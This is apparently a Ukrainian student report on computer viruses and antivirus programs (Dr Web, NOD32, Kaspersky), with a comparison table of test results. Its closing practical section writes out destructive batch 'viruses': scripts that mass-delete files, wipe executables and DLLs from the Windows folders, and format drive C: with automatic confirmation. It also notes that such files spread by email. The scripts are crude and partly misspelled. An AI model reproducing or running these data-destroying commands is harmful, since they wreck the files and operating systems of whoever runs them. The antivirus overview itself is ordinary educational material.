Віруси та антивірусні системи

Слід зазначити, що перераховані вище явища необов'язково викликаються присутністю вірусу, а можуть бути наслідком інших причин. Тому завжди утруднена правильна діагностика стану комп'ютера.

3. Антивірусні програми

Антивірус - це програма, призначена для сканування і розпізнавання на комп'ютері користувача програм або скриптів 2, макросів 3, які можуть завдати шкоди здоров'ю користувача або істотно сповільнити роботу комп'ютера

3.1 Характеристика антивірусних програм

Відомі нині антивірусні програми можна розділити на кілька типів:

- Детектори. Їх призначення - лише  виявити вірус. Детектори вірусів  можуть порівнювати завантажувальні  сектори дискет з відомими  завантажувальними секторами, формованими операційними системами різних версій, і таким чином виявити завантажувальні віруси або виконувати сканування файлів на магнітних дисках з метою виявлення сигнатур відомих вірусів. Такі програми в чистому вигляді в даний час рідкі.

- Доктора (Фагі. Фаг) - це програма, яка здатна не тільки виявити, а й знищити вірус, тобто видалити його код із заражених програм і відновити їх працездатність (якщо можливо). Найвідомішим у Росії фагом є Aidstest, створений Д. М. Лозинським. Одна з останніх версій виявляє більше 8000 вірусів. Aidstest для свого нормального функціонування потребує, щоб у пам'яті не було резидентних антивірусів, блокуючих запис в програмні файли, тому їх слід вивантажити, або, вказавши опцію вивантаження самої резидентної програмі, або скористатися відповідною утилітою.

- Ревізори. Програма-ревізор контролює  можливі шляхи розповсюдження  програм-вірусів і зараження комп'ютерів. Програми-ревізори відносяться до  найнадійніших засобів захисту  від вірусів і повинні входити  в арсенал кожного користувача. Ревізори є єдиним засобом, який дозволяє слідкувати за цілісністю і змінами файлів і системних областей магнітних дисків. Найбільш відома в Росії програма-ревізор ADinf, розроблена Д. Мостовим.

- Вакцини. Так називаються антивірусні  програми, що ведуть себе подібно вірусам, але не завдають шкоди. Вакцини оберігають файли від змін і здатні не тільки виявити факт зараження, але і в деяких випадках «вилікувати» уражені вірусами файли. В даний час антивірусні програми-вакцини широко не застосовуються, так як у минулі роки деякими некоректно працюють вакцинами було завдано шкоди багатьом користувачам.

3.2 Різновиди антивірусних  програм

Для знаходження вірусів Dr Web використовує програму емуляцію процесора, тобто він моделює виконання інших файлів за допомогою програмної моделі мікропроцесора I-8086 і тим самим створює середовище для прояву вірусів та їх розмноження. Таким чином, програма Dr Web може боротися не тільки з поліморфними вірусами, але і вірусів, які тільки ще можуть з'явитися в перспективі.

Основними функціональними особливостями Dr Web 4.33 є:

· Захист від черв'яків, вірусів, троянів, поліморфних вірусів, макровірусів, spyware, програм-дозвонщиков, adware, хакерських утиліт і шкідливих скриптів;

· Оновлення антивірусних баз до декількох разів на годину, розмір кожного оновлення до 15 KB;

· Перевірка системної пам'яті комп'ютера, що дозволяє виявити віруси, не існуючі у вигляді файлів (наприклад, CodeRed або Slammer);

· Евристичний аналізатор, що дозволяє знешкодити невідомі загрози до виходу відповідних оновлень вірусних баз.

Будь-який сучасний антивірусний продукт - це не тільки набір окремих технологій детектування, але й складна система захисту, побудована на власному розумінні антивірусної компанією того, як потрібно забезпечувати безпеку від шкідливих програм. При цьому прийняті багато років тому архітектурні та технічні рішення серйозно обмежують можливості змінювати співвідношення проактивних і реактивних методів захисту. Наприклад, в антивірусній системі Eset NOD32 використовуються як евристичні, так і сигнатурні методи боротьби з шкідливим кодом, але ролі між цими двома технологіями розподіляються не так, як в інших антивірусах: у той час як більшість антивірусів відштовхується від сигнатурних методів, доповнюючи їх евристиками, у Eset NOD32 все навпаки. Основним способом протистояння шкідливим програмам тут є так звані розширені евристики (Advanced Heuristics), що представляють собою поєднання емуляції, евристик, алгоритмічного аналізу та сигнатурного методу. У результаті розширені евристики Eset NOD32 дозволяють проактивно детектувати майже 90% всіх загроз, а інші усуваються сигнатурними методами. Надійність такого під ходу підтверджується результатами незалежних тестувань. Рис. 4.

Антивірус Касперського Personal призначений для антивірусного захисту персональних комп'ютерів, що працюють під управлінням операційних систем Windows 98/ME, 2000/NT/XP, від всіх відомих видів вірусів, включаючи потенційно небезпечне програмне забезпечення. Програма здійснює постійний контроль всіх джерел проникнення вірусів - електронної пошти, інтернету, дискет, компакт-дисків і т.д. Унікальна система евристичного аналізу даних ефективно нейтралізує невідомі віруси. Можна виділити наступні варіанти роботи програми (вони можуть використовуватися як окремо, так і в сукупності):

· Постійний захист комп'ютера - перевірка всіх запускаються, відкриваються і зберігаються на комп'ютері об'єктів на присутність вірусів.

· Перевірка комп'ютера за вимогою - перевірка і лікування як усього комп'ютера в цілому, так і окремих дисків, файлів або каталогів. Таку перевірку ви можете запускати самостійно або настроїти її регулярний автоматичний запуск.

Програма створює надійний бар'єр на шляху проникнення вірусів через електронну пошту. Антивірус Касперського Personal автоматично здійснює перевірку і лікування всієї вхідної та вихідної кореспонденції поштові по протоколах POP3 і SMTP і ефективно виявляє віруси в поштових базах. Програма підтримує більше семисот форматів архівованих і стислих файлів і забезпечує автоматичну антивірусну перевірку їх вмісту, а також видалення шкідливого коду з архівних файлів формату ZIP, CAB, RAR, ARJ, LHA і ICE. До складу Антивірусу Касперського включений спеціальний компонент, який забезпечує захист файлової системи комп'ютера від зараження, - Файловий Антивірус. Він запускається при старті операційної системи, постійно знаходиться в оперативній пам'яті комп'ютера і перевіряє всі відкриваються, зберігаються і запускаються вами або програмами файли.

 

3.3 Порівняльний аналіз  антивірусних програм

Для доказу переваг своїх продуктів розробники антивірусів часто використовують результати незалежних тестів. Для успішного проходження тесту необхідно виявити всі віруси цієї колекції і продемонструвати нульовий рівень помилкових спрацьовувань на колекції "чистих" файлів журналу. Тестування проводиться кілька разів на рік на різних операційних системах; успішно пройшли тест продукти отримують нагороду VB100%. Результати проведення тесту представлені в таблиці 3.1.

Таблиця 3. Результати тестування.

		Dr Web 4.33		Лабораторія Касперського		Eset NOD32
Кількість успішно проведених тестів VB100% за 2006-2007р		4		10		11
Загальний рівень виявлення шкідливого програмного забезпечення		92.40%		98.88%		94.38%
Середній час реакції на нові загроз, годинник		6-8		0-2		4-6
Лікування активного зараження		82%		71%		18%
Займана оперативна пам'ять у звичайному режимі роботи, кВ		8338		4500		29124
Час сканування даних, хв.		79		28
	23
Кількість відсканованих даних	133848		124914		123724
Усереднена по всіх тестів рейтинг антивірусів (чим менше, тим краще)	7,83		2,25		4,75

Зараз в Україні використовуються головним чином дві дуже гарні, перевірені, якісні антивірусні програми: Dr Web і Антивірус Касперського. Кожна з них має кілька різновидів, орієнтованих на різні сфери застосування: для використання на домашніх комп'ютерах, для малого і середнього бізнесу, для великих корпоративних клієнтів, для захисту локальних мереж, для поштових, файлових серверів, серверів додатків. За даними таблиці видно, що в одних антивірусів виграшним виявляється один показник, в інших - інший. Так, наприклад, Лабораторія Касперського робить акцент на швидкості реакції на появу нових загроз, Eset NOD32 - на силі своїх евристичних технологій, Dr Web 4.33 описує свої переваги в лікуванні активного зараження..

Вибираючи антивірус для своєї системи, потрібно переконатися, що він періодично завойовує нагороду VB100%. Це гарантує, що розробники антивіруса постійно контролюють появу нових небезпечних вірусів, своєчасно оновлюють антивірусну базу даних і вдосконалюють алгоритми виявлення вірусів.

Незважаючи на удавану велика кількість програмних антивірусних засобів, навіть всі разом вони не забезпечують повного захисту програм і даних, не дають 100%-ної гарантії від впливу вірусних програм. Тільки комплексні профілактичні заходи захисту забезпечують надійний захист від можливої ​​втрати інформації. У комплекс таких заходів входить

- Регулярне архівування інформації (створення резервних копій важливих  файлів і системних областей  вінчестера);

- Уникнення використання випадково  отриманих програм (намагайтеся користуватися лише законними шляхами отримання програм);

- Вхідний контроль нового програмного  забезпечення, що надійшли дискет;

- Сегментація жорсткого диска, тобто розбиття його на логічні  розділи з розмежуванням доступу  до них;

- Систематичне використання програм-ревізорів  для контролю цілісності інформації;

- При пошуку вірусів (який повинен  відбувається регулярно!) Намагайтеся  використовувати завідомо чисту  операційну систему, завантажену  з диску. Захищайте диски від  запису, якщо є хоч мала ймовірність зараження.

 

 

 

 

 

4. ПРАКТИЧНА ЧАСТИНА

для практичної частини своєї роботи я вирішила написати найпростіші bat віруси.

Вони складаються з простих команд, але можуть нанести суттєву шкоду в роботу комп’ютера.

 

1. для автоматичного видалення всіх файлів в папці де знаходиться файл з вірусом та видаленням самого вірусу

@ esho off

Del *.*/q

Del: virus.bat

Для запуску програми

1 зберегти як….

2 вибрати потрібну папку

3 імя файла писати як в  програмі в мому випадку virus.bat

4 зберегти

УВАГА

Не запускайту данну програму на робочому столі чи інших системних папках.

 

Також в таку програму можна прописати інші команди-

Створює пусті папки з (XXXXX-імя папки)

Md XXXXXX

Md XXXXXX

Md XXXXXX

Зміна дати на комп’ютері (XX.XX.XXXX-дата)

Data XX.XX.XXXX

Зміна часу на компютері (XX.XX-час)

Time XX.XX

Запуск калькулятора start calc

Запуск систем задач  start taskmgr

Запуск paint start mspaint

 

2. Також хочу показати більш сильний вірус. За допомогою якого видаляються всі файли з комп’ютера та потребується переустановка ОП

Cd\

Cd c:

Cd windows

Del*.exe

Del*.ini

Del *.com

Cd\

Cd windows

Cd sustem

Del *.dll

Del *.exe

 

Після запуску такої програми комп’ютер пропрацює ще 30 хвилин.

 

2. вірус на форматування диску С

Cd

Format C:\

Y 
Y 
Y

Y- автоматична згода на форматування диску C 

Такі програми в більшості потрапляють на комп’ютер через електронну пошту. Через автоматичний запуск програми відмінити її дію неможливо. Така програма може не працювати на комп’ютерах у яких встановлена ОП ХР, тому для цієї ОП є інша програма-вірус

C:\WINDOWS\ COMMAND

\format С:/autotest

 

 

СПИСОК ЛІТЕРАТУРИ

Основна література

1. Безруков Н.Н. Класифікація комп'ютерних вірусів MS-DOS і методи захисту від них / М.М. Безруков. - М.: СП "ICE", 1990
2. Безруков Н.Н. Комп'ютерні віруси / М.М. Безруков. - М.: Наука, 1991.
3. Денисов Т.В. Антивірусна захист / / Мій Комп'ютер-№ 4-1999.
4. Могилів А.В. Інформатика: навчальний посібник для студ. пед. вузів / А. В. Могильов Н. І. Пак, Є. К. Хеннер; Під ред. Є. К. Хеннер. - М.: Академія, 2000.

Інтернет-ресурси

1. http://www.avp.ru/
2. http://www2.dialognauka.ru/
3. http://ru.wikipedia.org

http://www.xakege.narod.ru